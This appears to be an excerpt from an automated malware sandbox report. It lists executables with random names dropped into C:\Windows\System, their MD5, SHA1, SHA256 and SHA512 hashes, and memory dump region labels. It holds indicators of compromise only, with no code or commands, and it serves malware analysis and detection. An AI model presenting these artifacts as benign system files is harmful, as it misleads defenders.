C:\Windows\System\YzoTkNO.exe

MD5 f16f834f9ad54086fe99464780f03bdf
SHA1 7a3bd2a6809a3de986a6b9fd078d6a6606b6e792
SHA256 2d9791caac3e789bcd4cc48804865b9472155e2330d722e6222c571a3ca0b8f8
SHA512 6a8f60a64fd57095116f1672f6d3852e304a2589a91084ee65e672a2fb07d17dc3d16aaea3facc53419b2935f5c0a87388b3908bb77fc6bb7dcd68a99c736a78

C:\Windows\System\wScrOdp.exe

MD5 59b023133fbdd76a936bebde3edf87df
SHA1 ba2bf3fb5d71f5bc54c59d84a6aafe63faf9aa9a
SHA256 ad045e1d1977d1e304ada509b0bd77aac5f4d6e76e1968a5d594583c88db0099
SHA512 7cb4490ac3ab343a2f0ab25f27fac07284606b0d21259c9fc3ac0642d7d8573166cfb9ac2e46a8a29cff35c167d6f1874dca20f216f6e2a9e814f3ac2b6c5b0b

C:\Windows\System\YfFaJbS.exe

MD5 68ad031b0ba2d4eea713d1690b5a716a
SHA1 b3c4e97778befbec1e46d4099bbcc62192c52b5f
SHA256 accf12e94c33381419bb2fc43b1df4d4f943c77e81b0a9da60c9dc476fa2b7c8
SHA512 c39e970e1c1aa9bd3b012e4e72ccd2a66a9314dd36ffa573b9ce31f5fd170f19b7b351bf9dfde75389acb4e70af258c9ba91b64369e614be3e3280d0f7e3455b

memory/3124-60-0x00007FF70F100000-0x00007FF70F4F2000-memory.dmp

C:\Windows\System\gRsstgN.exe

MD5 c527e7ca111422ffdf2fff8c29f4ba83
SHA1 4d3457b9073cbf8aac3df52d02584ed6b51d620d
SHA256 8bf9260463441e3e99cc2bac94b59d5a6048b3eb288be75356efe591d097f35d
SHA512 c7e084052c9c1d217d2f438242efd454008ad00e05caf6ceb8df50fa3ceaf41aebaa250acc238ed67b98fb48d9a7ca9f8a81d02168f314c73674a61dffe74d2d

C:\Windows\System\DYAbeqw.exe

MD5 f3eb5182c8c46333ed58dc70c708d1a6
SHA1 8163626f711b05a8ebc56c57e5cbfe84b6fd7801
SHA256 7da141b26faf73e13b66b40e10c25e03dcf1a5a4c6b6958f02efe954101ab7a5
SHA512 b339c609d9268e0bbc989e03d24660cf15a71b57ad90b5370f3461b586c25f357d25d6f06b77cfc70546eb96f01ec40140157ddd8ab78a260ed8da9c742bd932

memory/4896-43-0x00007FF658850000-0x00007FF658C42000-memory.dmp

memory/3540-36-0x00007FF6D9EA0000-0x00007FF6DA292000-memory.dmp

memory/2628-24-0x000001DD5AD00000-0x000001DD5AD10000-memory.dmp

C:\Windows\System\oLNmthv.exe

MD5 e1604964ebc9ee8cc0ce8bdb6fab3f3c
SHA1 907283a89d86ab69564d945ee84a7bedba5a9867
SHA256 4d234628567d146a6b2d652c2ee6f3cc6a181c9f58e517ee680532a1d16f4bf0
SHA512 cf5bfc2f56464564513d2238c2dee7021d4b70322a7196ae7fee319da6e02ffa763b02011445a339dd5f38ca6c164465f28c8df359dccdd4f01bc786aaee3e6e

memory/2676-18-0x00007FF735150000-0x00007FF735542000-memory.dmp

C:\Windows\System\FqxeVtG.exe

MD5 4585af961e6be7f3b03d075298565b62
SHA1 8e84c60639225761f581ea4ec1ff9a2d8e5472c9
SHA256 b8920be4ca9181e84576dfb449141c7d9af40d7ddc5588ea3cac8c68ef3a0a88
SHA512 aca862ef42a6056537a17dcbf9d8778efa38fbecbcb6ce3dce02a2eb0f5b9ffb56a667b21c26a29159a0ebcd14d21a77c5b25a36880c46863acba28da90e75f0

memory/1680-5733-0x00007FF7B4750000-0x00007FF7B4B42000-memory.dmp

memory/3540-5741-0x00007FF6D9EA0000-0x00007FF6DA292000-memory.dmp

memory/1396-5745-0x00007FF6D0E60000-0x00007FF6D1252000-memory.dmp

memory/3124-5757-0x00007FF70F100000-0x00007FF70F4F2000-memory.dmp

memory/5096-5763-0x00007FF7C0450000-0x00007FF7C0842000-memory.dmp

memory/1052-5760-0x00007FF7102B0000-0x00007FF7106A2000-memory.dmp

memory/4896-5751-0x00007FF658850000-0x00007FF658C42000-memory.dmp

memory/1440-5853-0x00007FF63DF80000-0x00007FF63E372000-memory.dmp

memory/1440-5948-0x00007FF63DF80000-0x00007FF63E372000-memory.dmp

memory/412-5978-0x00007FF78FB30000-0x00007FF78FF22000-memory.dmp

memory/3148-5945-0x00007FF7E7170000-0x00007FF7E7562000-memory.dmp

memory/4588-5943-0x00007FF7705D0000-0x00007FF7709C2000-memory.dmp

memory/3368-5931-0x00007FF6915D0000-0x00007FF6919C2000-memory.dmp

memory/4620-6109-0x00007FF7EA970000-0x00007FF7EAD62000-memory.dmp

memory/1724-6064-0x00007FF6B5C60000-0x00007FF6B6052000-memory.dmp

memory/3204-6019-0x00007FF794F30000-0x00007FF795322000-memory.dmp

memory/3676-5983-0x00007FF790FE0000-0x00007FF7913D2000-memory.dmp

memory/2900-5990-0x00007FF674D60000-0x00007FF675152000-memory.dmp

memory/4080-5984-0x00007FF6A96D0000-0x00007FF6A9AC2000-memory.dmp

C:\Windows\System\ghQPOnq.exe

MD5 71e0e9a01c07c9af3d26de48f425201d
SHA1 0428e838f0440f448214021201dccc3b0cd9314d
SHA256 c3558c958ef14ea5da64069945aac0435e2391341e2da791416812aed335e45b
SHA512 69137ecd2fa8a765e623ee3270350595212a21c7d849338768b929e0e0bcf6cc828bf542e28ee333c298d574dbbea34bd07daa602194212c7e6c0a564cfbc33e